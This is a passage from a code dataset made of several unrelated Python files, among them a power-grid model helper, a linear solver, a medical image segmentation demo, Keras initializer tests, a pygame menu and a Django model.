-- name of module to add\n params: Keyword arguments become parameters of the module.\n Some property names are not allowed as keywords in Python.\n To get around this problem, pass the parameters as a dictionary with ** in front:\n add_module(obj_type, obj_name, **{property1: prop_val1, ...}).\n \"\"\"\n if self.modules.get(module_name) is None:\n self.modules[module_name] = params\n else:\n warnings.warn(f'Overwriting module, {module_name}, parameters!')\n self.modules[module_name] = params\n\n def require_module(self, module_name, **params):\n \"\"\"\n Will ensure that the module is included. If not it will be added. If it is already included it will do nothing.\n This is similar to add_module but does not overwrite parameters if it already exists\n Parameters\n ----------\n module_name\n params\n\n \"\"\"\n if self.modules.get(module_name) is None:\n self.modules[module_name] = params\n\n def add_helics(self, federate_name, config_path):\n \"\"\"\n Add everything the model needs to enable HELICS use with GridLAB-D\n Parameters\n ----------\n federate_name: str -- name of federate\n config_path: str or Path -- path to HELICS configuration file\n\n Returns\n -------\n\n \"\"\"\n self.require_module('connection')\n self.add_object('helics_msg', federate_name, configure=Path(config_path).as_posix())\n\n def remove_helics(self):\n \"\"\"\n Remove HELICS from model so it can run independently.\n \"\"\"\n if self.model.get('helics_msg') is not None:\n del self.model['helics_msg']\n\n def rename_all_nodes(self, prefix=None):\n if prefix is None:\n prefix = \"n\"\n swing_nodes = self.swing_nodes()\n if len(swing_nodes) != 1:\n warnings.warn(\"This method assumes the model has a single SWING bus.\")\n return\n if len(swing_nodes) == 1:\n root = swing_nodes[0]\n g = self.create_graph(delete_open=True)\n g = graph.fix_reversed_links(g, root)\n node_gen = nx.dfs_preorder_nodes(g, source=root)\n for i, n, in enumerate(node_gen):\n\n new_name = prefix + f\"{i+1}\"\n self.rename_object(n, new_name)\n print(f\"{i+1}: {n}: {new_name}\")\n\n def rename_all_overhead_lines(self, prefix=None):\n\n if prefix is None:\n prefix = \"ohl\"\n lines = [line for line in self.model.get('overhead_line').keys()]\n for line in lines:\n n_from = self.model['overhead_line'][line]['from']\n n_to = self.model['overhead_line'][line]['to']\n new_name = f\"{prefix}_{n_from}_{n_to}\"\n 
self.rename_object(line, new_name, 'overhead_line')\n\n def rename_all_fuses(self, prefix=None):\n\n if prefix is None:\n prefix = \"fuse\"\n fuses = [fuse for fuse in self.model.get('fuse').keys()]\n for fuse in fuses:\n n_from = self.model['fuse'][fuse]['from']\n n_to = self.model['fuse'][fuse]['to']\n new_name = f\"{prefix}_{n_from}_{n_to}\"\n self.rename_object(fuse, new_name, 'fuse')\n\n def rename_all_loads(self, prefix=None):\n if prefix is None:\n prefix = \"load\"\n loads = [line for line in self.model.get('load').keys()]\n for load in loads:\n parent = self.model['load'][load].get('parent')\n if parent is None:\n warnings.warn(\"Load is not a child object. This method assumes loads have parent nodes.\")\n return\n new_name = f\"{prefix}_{parent}\"\n self.rename_object(load, new_name, 'load')\n\n # TODO: add method for combining GLMs. Duplicate could be optionally deleted or renamed.\n\n # ~~~~~~~~~~ Static Methods ~~~~~~~~~~~~~\n @staticmethod\n def read_csv(filepath, **kwargs):\n \"\"\"\n Read GridLAB-D output csv file into a dataframe. This will automatically choose the appropriate header line.\n Parameters\n ----------\n filepath\n\n \"\"\"\n try:\n df = pd.read_csv(\n filepath,\n sep=',',\n header=1, index_col=0, **kwargs)\n except pd.errors.ParserError:\n df = pd.read_csv(\n filepath,\n sep=',',\n header=8, index_col=0, **kwargs)\n return df\n","repo_name":"nathantgray/glmpy_public","sub_path":"glmpy/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":34808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18478888399","text":"input_list = input().split()\ndictionary_groceries = {}\nfor sequence in range(0, len(input_list), 2):\n key = input_list[sequence]\n value = input_list[sequence + 1]\n dictionary_groceries[key] = int(value)\nlooking_list = input().split()\nfor item in looking_list:\n if item in dictionary_groceries:\n print(f\"We have {dictionary_groceries[item]} of {item} left\")\n else:\n print(f\"Sorry, we don't have {item}\")","repo_name":"RadoslavTs/SoftUni-Courses","sub_path":"2. Python Fundamentals/07. Dictionaries/Lab/02. stock.py","file_name":"02. 
stock.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71592655122","text":"import numpy as np\r\nimport pandas as pd\r\n\r\ndef SOR(A, b, x0, Tol, niter, w):\r\n \"\"\"\r\n Solve a system of equations using the Successive Over-Relaxation (SOR) method using infinite norm to calculate error.\r\n\r\n Parameters:\r\n - A: 2D numpy array, the coefficient matrix.\r\n - b: 2D numpy array, the independent vector.\r\n - x0: 2D numpy array, the initial guess for the solution.\r\n - Tol: float, the tolerance for the solution.\r\n - niter: int, the maximum number of iterations.\r\n - w: float, the relaxation parameter.\r\n\r\n Prints the approximation solution and the intermediate values for the solution.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n\r\n n = 0 # Initialize counter\r\n error = Tol + 1 # Initialize error\r\n x = x0.copy()\r\n D = np.diag(np.diag(A)) # Create matrix with diagonal elements of A\r\n L = -np.tril(A, -1) # Lower triangular part of A\r\n U = -np.triu(A, 1) # Upper triangular part of A\r\n\r\n df = pd.DataFrame(columns=['x' + str(i) for i in range(1, len(x0) + 1)] + ['Error'])\r\n\r\n while error > Tol and n < niter:\r\n T = np.linalg.inv(D - w * L) @ ((1 - w) * D + w * U)\r\n C = w * np.linalg.inv(D - w * L) @ b\r\n x1 = T @ x + C\r\n error = np.linalg.norm(x1 - x, np.inf)\r\n itemsol = [item for sublist in x1.tolist() for item in sublist]\r\n itemsol.append(error)\r\n df.loc[n] = itemsol\r\n n += 1\r\n x = x1.copy()\r\n\r\n if error < Tol:\r\n print([item for sublist in x.tolist() for item in sublist], \"is an approximation with a tolerance of\", error)\r\n else:\r\n print(\"Failed within\", n, \"iterations\")\r\n\r\n print(\"The intermediate values for the solution are:\")\r\n print(df)\r\n\r\nA = np.array(([(1/1160)+1, 0, -1/1160, 1/1160],\r\n [1.225*18.5, -1.225*15.165*0.0292*185+1e-6, 0, 0],\r\n [1/1160, 0, 1, -1/1160],\r\n [1, 0, 0, -1-1e-6])) #Define matrix A with syntax = ([a11, a12, a13], [a21, a22, a23], ...)\r\nb = np.array(([300], [5], [185], [133])) #Define matrix b with syntax = ([b11], [b21], [b31])\r\nx0 = np.array(([1], [1], [1], [1])) #Define initial condition with syntax = ([11], [21], [31])\r\n\r\nSOR(A, b, x0, 0.5e-5, 100, 1)\r\n","repo_name":"JCOM127/System-of-Equation-Solvers","sub_path":"SOR.py","file_name":"SOR.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"45260151882","text":"import argparse\r\nimport torch\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom torchvision import transforms\r\nimport matplotlib.pyplot as plt\r\nfrom google.colab.patches import cv2_imshow\r\nfrom datasets.dataset_polyp import PolypDataset\r\nfrom networks.vit_seg_modeling import CONFIGS as CONFIGS_ViT_seg\r\nfrom networks.vit_seg_modeling import VisionTransformer as ViT_seg\r\nimport gradio as gr\r\n\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\n\r\nparser.add_argument('--img_root', type=str, default='/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Original/', help='root dir for data')\r\nparser.add_argument('--gt_root', type=str, default='/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Ground Truth/', help='root dir for mask')\r\nparser.add_argument('--num_classes', type=int, default=2, help='output channel of network')\r\nparser.add_argument('--max_iterations', type=int,default=20000, 
help='maximum epoch number to train')\r\nparser.add_argument('--max_epochs', type=int, default=30, help='maximum epoch number to train')\r\nparser.add_argument('--batch_size', type=int, default=16, help='batch_size per gpu')\r\nparser.add_argument('--img_size', type=int, default=224, help='input patch size of network input')\r\nparser.add_argument('--n_skip', type=int, default=3, help='using number of skip-connect, default is num')\r\nparser.add_argument('--vit_name', type=str, default='R50-ViT-B_16', help='select one vit model')\r\nparser.add_argument('--test_save_dir', type=str, default='/content/drive/MyDrive/MyTransunet/TransUNet-repo/predictions', help='saving prediction as nii!')\r\nparser.add_argument('--deterministic', type=int, default=1, help='whether use deterministic training')\r\nparser.add_argument('--base_lr', type=float, default=0.01, help='segmentation network learning rate')\r\nparser.add_argument('--seed', type=int, default=1234, help='random seed')\r\nparser.add_argument('--vit_patches_size', type=int, default=16, help='vit_patches_size, default is 16')\r\nargs = parser.parse_args()\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Define the preprocessing transforms\r\n preprocess = transforms.Compose([\r\n transforms.RandomRotation(90, expand=False, center=None, fill=None),\r\n transforms.RandomVerticalFlip(p=0.5),\r\n transforms.RandomHorizontalFlip(p=0.5),\r\n transforms.Resize((224, 224)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n\r\n trnsfrm = transforms.Compose([\r\n transforms.Resize((224, 224)),\r\n transforms.ToTensor(),\r\n ])\r\n\r\n\r\n def predict(image_type, image):\r\n dataset_config = {\r\n 'Polyp': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Original/',\r\n 'gt_root': '/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Ground Truth/',\r\n },\r\n 'Kvasir': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/datasets/Kvasir-SEG/images/',\r\n 'gt_root': '/content/drive/MyDrive/datasets/Kvasir-SEG/masks/',\r\n },\r\n 'Ph2': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/datasets/ph2/trainx/',\r\n 'gt_root': '/content/drive/MyDrive/datasets/ph2/trainy/',\r\n },\r\n 'CVCKvasir': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/datasets/CVC-Kvasir/images/',\r\n 'gt_root': '/content/drive/MyDrive/datasets/CVC-Kvasir/masks/'\r\n },\r\n }\r\n\r\n dataset_name = ('CVCKvasir' if image_type == 'Polyp' else 'Ph2')\r\n\r\n args.num_classes = dataset_config[dataset_name]['num_classes']\r\n args.Dataset = dataset_config[dataset_name]['Dataset']\r\n args.img_root = dataset_config[dataset_name]['img_root']\r\n args.gt_root = dataset_config[dataset_name]['gt_root']\r\n args.is_pretrain = True\r\n\r\n config_vit = CONFIGS_ViT_seg[args.vit_name]\r\n config_vit.n_classes = args.num_classes\r\n config_vit.n_skip = args.n_skip\r\n config_vit.patches.size = (args.vit_patches_size, args.vit_patches_size)\r\n if args.vit_name.find('R50') !=-1:\r\n config_vit.patches.grid = (int(args.img_size/args.vit_patches_size), int(args.img_size/args.vit_patches_size))\r\n \r\n net = ViT_seg(config_vit, img_size=args.img_size, num_classes=config_vit.n_classes)\r\n\r\n if dataset_name == 'Polyp':\r\n snapshot = 
'/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_Polyp224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n elif dataset_name == 'Kvasir':\r\n snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_Kvasir224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n elif dataset_name == 'Ph2':\r\n snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_Ph2224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n \r\n elif dataset_name == 'CVCKvasir':\r\n snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_CVCKvasir224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n # snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TransCASCADE_Ph2224/TransCASCADE_pretrain_R50-ViT-B_16_skip3_epo150_bs16_lr0.0001_224/epoch_149.pth'\r\n net.load_state_dict(torch.load(snapshot))\r\n\r\n image = Image.fromarray(image)\r\n _image = trnsfrm(image) # tensor\r\n _image = _image.unsqueeze(0) # ([1, 3, 224, 224])\r\n with torch.no_grad():\r\n prediction = torch.argmax(torch.softmax(net(_image), dim=1), dim=1)\r\n mask = prediction.squeeze().numpy()\r\n mask = Image.fromarray((mask * 255).astype(np.uint8))\r\n return mask\r\n\r\n\r\n inputs = gr.inputs.Image()\r\n outputs = gr.outputs.Image(type='pil').style(width=224, height=224, margin='auto')\r\n gr.Interface(fn=predict, \r\n inputs=[\r\n gr.Radio([\"Polyp\", \"Skin lesion\"], label=\"Image Type\", info=\"Choose type of medical image\"), # change 'Skin' to 'Skin Lesion', 'Datasets' to 'Image Type'\r\n inputs,\r\n ], \r\n outputs=outputs,\r\n flagging_options=[\"correct ✅\", \"incorrect ❌\", \"other\"],\r\n capture_session=True,\r\n examples=[\r\n # ['Skin lesion', os.path.join(os.path.abspath(''), \"/content/drive/MyDrive/datasets/ph2/trainx/X_img_0.bmp\")],\r\n ['Skin lesion', os.path.abspath(\"/content/drive/MyDrive/MyTransunet/TransUNet-repo/TransUNet/gradio-examples/Ph2/X_img_53.bmp\")],\r\n ['Polyp', os.path.abspath('/content/drive/MyDrive/MyTransunet/TransUNet-repo/TransUNet/gradio-examples/EndoScene/images/123.png')],\r\n ], \r\n title='Medical Image Segmentation System (MISS)',\r\n description='This is image segmentation system for medical images of polyps and skin lesions. 
This app is implemented by `@Mahdi_Niknejad`'\r\n ).launch(share=True, debug=True)","repo_name":"mnn59/BSc","sub_path":"gradio_test.py","file_name":"gradio_test.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41255578382","text":"import json\nimport logging\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport click\nfrom tqdm import tqdm\n\nlogger = logging.getLogger(__name__)\n\n\n@click.command()\n@click.argument(\"dataset-file\")\n@click.option(\"--verbose\", is_flag=True)\ndef main(\n dataset_file: str,\n verbose: bool,\n):\n if verbose:\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.INFO)\n dataset_file = Path(dataset_file)\n with dataset_file.open(\"r\") as f:\n tasks = json.load(f)\n\n image_to_tasks = defaultdict(list)\n for task in tqdm(tasks):\n image_to_tasks[task[\"image\"]].append(task[\"annotation_id\"])\n\n duplicates = [(k, v) for k, v in image_to_tasks.items() if len(v) > 1]\n print(\"image url: num duplicates - annotation ids\")\n for duplicate in duplicates:\n print(f\"{duplicate[0]}: {len(duplicate[1])} - {duplicate[1]}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"akucia/analog-watch-recognition","sub_path":"scripts/find-duplicated-images.py","file_name":"find-duplicated-images.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"70433714642","text":"import os\nimport pygame\nfrom button import Button\nfrom clickable_image import ClickableImage\n\n\nclass Road_select:\n def __init__(self, surface, menu, login):\n self.surface = surface\n self.menu = menu\n self.choosen = 4\n self.choosen_road = 0\n self.path = '\\\\'.join(os.getcwd().split('\\\\')[:-1]) + '\\\\menu_and_game\\\\'\n self.login = login\n self.roads = ['road', 'road_v2', 'road_v3', 'ice_road']\n self.images = self.load_images()\n self.buttons = self.load_buttons()\n\n def load_images(self):\n images = []\n x, y = 100, 40\n for elem in self.roads:\n image = ClickableImage(x, y, elem, self.surface)\n images.append(image)\n if x < 600:\n x += 250\n else:\n y += 270\n x = 100\n return images\n\n def load_buttons(self):\n x, y = self.surface.get_width() // 3 - 135, 210\n buttons = []\n for i in range(len(self.roads)):\n if i != self.choosen:\n i = Button(x - 25, y + 5, 80, 30, 'Выбрать', self.surface,\n (66, 245, 206),\n (0, 0, 0), (227, 66, 245), 0, 25, self.choose)\n else:\n i = Button(x - 25, y + 5, 80, 30, 'Выбрано', self.surface,\n (66, 245, 206),\n (0, 0, 0), (227, 66, 245), 0, 25, self.choose)\n buttons.append(i)\n if x < 600:\n x += 250\n else:\n y += 270\n x = 135\n buttons.append(\n Button(106, 650, 80, 30, 'Выбрать', self.surface, (66, 245, 206),\n (0, 0, 0), (227, 100, 245), 0, 25, self.choose))\n return buttons\n\n def change_text(self):\n for i in range(len(self.buttons)):\n if i != self.choosen:\n self.buttons[i].set_text('Выбрать')\n else:\n self.buttons[i].set_text('Выбрано')\n\n def choose(self):\n if self.choosen == 4:\n self.choosen_road = 0\n else:\n self.choosen_road = pygame.transform.scale(\n self.images[self.choosen].orig_image, (800, 800))\n\n def check_mouse_motion(self, pos):\n for btn in self.buttons:\n btn.check_mouse_motion(pos)\n\n def check_mouse_down(self, pos):\n for btn in self.buttons:\n btn.check_mouse_down(pos)\n if btn.state == 'pressed':\n self.choosen = self.buttons.index(btn)\n for img in self.images:\n 
img.check_mouse_down(pos)\n\n def check_mouse_up(self):\n for btn in self.buttons:\n btn.check_mouse_up()\n\n def quit(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE and self.menu.in_roads:\n self.menu.in_roads = False\n return True\n\n def render(self):\n for i in self.images:\n i.render()\n for btn in self.buttons:\n btn.render()\n font = pygame.font.SysFont('Montserrat', 50)\n text = font.render(f'Случайная дорога', True, (0, 106, 98))\n self.surface.blit(text, (65, 600))\n self.change_text()\n","repo_name":"code-n-cry/pyrace","sub_path":"menu_and_game/road_select.py","file_name":"road_select.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"13930698353","text":"from django.conf import settings\nfrom django.db import models\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import gettext_lazy as _\nfrom taggit.managers import TaggableManager\n\nfrom libs.base_model import BaseModel\n\nfrom ..querysets import EpisodeQuerySet\n\n\nclass Episode(BaseModel):\n objects = EpisodeQuerySet.as_manager()\n\n tags = TaggableManager()\n\n id = models.AutoField(primary_key=True)\n student = models.ForeignKey(\n \"Student\",\n verbose_name=_(\"Student for the episode\"),\n on_delete=models.CASCADE,\n )\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"Educator that created the episode\"),\n on_delete=models.CASCADE,\n )\n title = models.CharField(max_length=255, verbose_name=_(\"Title\"))\n description = models.TextField(verbose_name=_(\"Description\"))\n description_html = models.TextField(\n verbose_name=_(\"HTML Description of the episode\"),\n null=True,\n blank=True,\n )\n description_ids = models.TextField(\n verbose_name=_(\"HTML Description IDS of the episode\"),\n null=True,\n blank=True,\n )\n transcript_html = models.TextField(\n verbose_name=_(\"HTML Transcript of the episode\"), null=True, blank=True\n )\n transcript = models.TextField(\n verbose_name=_(\"Transcript\"), null=True, blank=True\n )\n transcript_ids = models.TextField(\n verbose_name=_(\"HTML Transcript IDS of the episode\"),\n null=True,\n blank=True,\n )\n is_active = models.BooleanField(default=True)\n date = models.DateTimeField()\n full = models.BooleanField(\n verbose_name=_(\"Fully entered in grid\"), default=False\n )\n landmark = models.BooleanField(\n verbose_name=_(\"landmark episode\"), default=False\n )\n\n # later on heads_up should be remove, heads_up_json name should be changed\n heads_up = models.TextField(\n verbose_name=_(\"Heads Up\"), null=True, blank=True\n )\n heads_up_json = models.JSONField(verbose_name=_(\"Heads Up\"), null=True)\n\n practitioner = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"Educator that contributed the episode\"),\n null=True,\n on_delete=models.SET_NULL,\n related_name=\"contributed_episodes\",\n )\n\n @cached_property\n def writers(self):\n examples = self.example_set.all()\n\n added_bys = set([example.added_by for example in examples])\n\n return list(added_bys)\n\n @cached_property\n def contributors(self):\n added_bys = self.writers\n\n return added_bys\n","repo_name":"stanislavpol00/education","sub_path":"main/models/episode.py","file_name":"episode.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72063088402","text":"from tkinter import *\n\nif 
__name__=='__main__':\n    print('in')\n    win=Tk()\n    win.title('Learn Tk Button')\n    win.geometry('500x500+200+50')\n    btn1=Button(win,\n            text='退出',\n            width=20,\n            height=5,\n            command=win.quit\n            )\n    btn1.pack()
\n    \n    def event_enter(event):\n        print('enter: ({0},{1})'.format(event.x,event.y))\n    def event_leave(event):\n        print('leave: ({0},{1})'.format(event.x,event.y))\n    def event_double_click(event):\n        print('double_click: ({0},{1})'.format(event.x,event.y))\n    def func():\n        print('欢迎')
\n    \n    btn2=Button(win,\n            text='点我有惊喜',\n            width=40,\n            height=5,\n            command=func\n            )\n    # bind mouse events: double-click, pointer enter and pointer leave\n    btn2.bind('<Double-Button-1>',event_double_click)\n    btn2.bind('<Enter>',event_enter)\n    btn2.bind('<Leave>',event_leave)\n    btn2.pack()
\n    \n    print('exit')\n    mainloop()\n    # win.mainloop()","repo_name":"caldz/python","sub_path":"practice/tkinter_test/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"71784395922","text":"import pytest\nimport numpy as np\n\nfrom keras import initializers\nfrom keras import backend as K\n\n# 2D tensor test fixture\nFC_SHAPE = (200, 100)\n\n# 4D convolution in th order. This shape has the same effective shape as FC_SHAPE\nCONV_SHAPE = (25, 25, 20, 20)
\n\n\ndef _runner(init, shape, target_mean=None, target_std=None,\n            target_max=None, target_min=None):\n    variable = K.variable(init(shape))\n    output = K.get_value(variable)\n    lim = 3e-2\n    if target_std is not None:\n        assert abs(output.std() - target_std) < lim\n    if target_mean is not None:\n        assert abs(output.mean() - target_mean) < lim\n    if target_max is not None:\n        assert abs(output.max() - target_max) < lim\n    if target_min is not None:\n        assert abs(output.min() - target_min) < lim
\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_uniform(tensor_shape):\n    _runner(initializers.RandomUniform(minval=-1, maxval=1), tensor_shape,\n            target_mean=0., target_max=1, target_min=-1)
\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_normal(tensor_shape):\n    _runner(initializers.RandomNormal(mean=0, stddev=1), tensor_shape,\n            target_mean=0., target_std=1)
\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_truncated_normal(tensor_shape):\n    _runner(initializers.TruncatedNormal(mean=0, stddev=1), tensor_shape,\n            target_mean=0., target_std=None, target_max=2)
\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_constant(tensor_shape):\n    _runner(initializers.Constant(2), tensor_shape,\n            target_mean=2, target_max=2, target_min=2)
\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_lecun_uniform(tensor_shape):\n    fan_in, _ = initializers._compute_fans(tensor_shape)\n    scale = np.sqrt(3. / fan_in)\n    _runner(initializers.lecun_uniform(), tensor_shape,\n            target_mean=0., target_max=scale, target_min=-scale)
\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_glorot_uniform(tensor_shape):\n    fan_in, fan_out = initializers._compute_fans(tensor_shape)\n    scale = np.sqrt(6. / (fan_in + fan_out))\n    _runner(initializers.glorot_uniform(), tensor_shape,\n            target_mean=0., target_max=scale, target_min=-scale)
\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_he_uniform(tensor_shape):\n    fan_in, _ = initializers._compute_fans(tensor_shape)\n    scale = np.sqrt(6. 
/ fan_in)\n _runner(initializers.he_uniform(), tensor_shape,\n target_mean=0., target_max=scale, target_min=-scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_glorot_normal(tensor_shape):\n fan_in, fan_out = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(2. / (fan_in + fan_out))\n _runner(initializers.glorot_normal(), tensor_shape,\n target_mean=0., target_std=None, target_max=2 * scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_he_normal(tensor_shape):\n fan_in, _ = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(2. / fan_in)\n _runner(initializers.he_normal(), tensor_shape,\n target_mean=0., target_std=None, target_max=2 * scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_lecun_normal(tensor_shape):\n fan_in, _ = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(1. / fan_in)\n _runner(initializers.lecun_normal(), tensor_shape,\n target_mean=0., target_std=scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_orthogonal(tensor_shape):\n _runner(initializers.orthogonal(), tensor_shape,\n target_mean=0.)\n\n\n@pytest.mark.parametrize('tensor_shape', [(100, 100), (1, 2, 3, 4)], ids=['FC', 'CONV'])\ndef test_identity(tensor_shape):\n if len(tensor_shape) > 2:\n with pytest.raises(ValueError):\n _runner(initializers.identity(), tensor_shape,\n target_mean=1. / tensor_shape[0], target_max=1.)\n else:\n _runner(initializers.identity(), tensor_shape,\n target_mean=1. / tensor_shape[0], target_max=1.)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_zero(tensor_shape):\n _runner(initializers.zeros(), tensor_shape,\n target_mean=0., target_max=0.)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_one(tensor_shape):\n _runner(initializers.ones(), tensor_shape,\n target_mean=1., target_max=1.)\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"xmengli/H-DenseUNet","sub_path":"Keras-2.0.8/tests/keras/initializers_test.py","file_name":"initializers_test.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":509,"dataset":"github-code","pt":"3"} +{"seq_id":"10057574320","text":"def fight(knights, game_map, t):\n cooldown = 3 # 3 seconds\n combats = {}\n dead = []\n king_key = {'red': None, 'blue': None}\n for k in knights:\n igrid = k.x // game_map.ng\n jgrid = k.y // game_map.ng\n key = f'{igrid},{jgrid}'\n if key not in combats:\n combats[key] = {k.team: [k]}\n elif k.team not in combats[key]:\n combats[key][k.team] = [k]\n else:\n combats[key][k.team].append(k)\n if k.kind == 'king':\n king_key[k.team] = key\n for key in combats:\n if set(combats[key]) == {'blue', 'red'}:\n if key == king_key['blue']:\n blue_attack = max(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['blue']])\n else:\n blue_attack = sum(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['blue']])\n if key == king_key['red']:\n red_attack = max(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['red']])\n else:\n red_attack = sum(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['red']])\n for k in combats[key]['blue']:\n k.health = max(0,\n k.health - int(red_attack / len(combats[key]['blue'])))\n if k.health <= 0:\n dead.append(k)\n if k.cooldown == 0:\n 
k.cooldown = cooldown\n for k in combats[key]['red']:\n k.health = max(0,\n k.health - int(blue_attack / len(combats[key]['red'])))\n if k.health <= 0:\n dead.append(k)\n if k.cooldown == 0:\n k.cooldown = cooldown\n return dead\n","repo_name":"nvaytet/quest","sub_path":"src/quest/core/fight.py","file_name":"fight.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30137074010","text":"# train.py\n\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport plugins\nimport math\n\n\nclass Trainer():\n def __init__(self, args, model, criterion):\n\n self.args = args\n self.model = model\n self.criterion = criterion\n\n self.port = args.port\n self.dir_save = args.save\n\n self.cuda = args.cuda\n self.nepochs = args.nepochs\n self.nclasses = args.nclasses\n self.nchannels = args.nchannels\n self.batch_size = args.batch_size\n self.resolution_high = args.resolution_high\n self.resolution_wide = args.resolution_wide\n\n self.lr = args.learning_rate\n self.momentum = args.momentum\n self.adam_beta1 = args.adam_beta1\n self.adam_beta2 = args.adam_beta2\n self.weight_decay = args.weight_decay\n self.optim_method = args.optim_method\n\n # Felix added\n self.dataset_train_name = args.dataset_train\n\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n if self.optim_method == 'Adam':\n self.optimizer = optim.Adam(parameters, lr=self.lr, betas=(self.adam_beta1, self.adam_beta2), weight_decay=self.weight_decay)\n elif self.optim_method == 'RMSprop':\n self.optimizer = optim.RMSprop(parameters, lr=self.lr, momentum=self.momentum, weight_decay=self.weight_decay)\n elif self.optim_method == 'SGD':\n self.optimizer = optim.SGD(parameters, lr=self.lr, momentum=self.momentum, weight_decay=self.weight_decay, nesterov=True)\n else:\n raise(Exception(\"Unknown Optimization Method\"))\n\n # for classification\n self.label = torch.zeros(self.batch_size).long()\n self.input = torch.zeros(self.batch_size,self.nchannels,self.resolution_high,self.resolution_wide)\n\n if 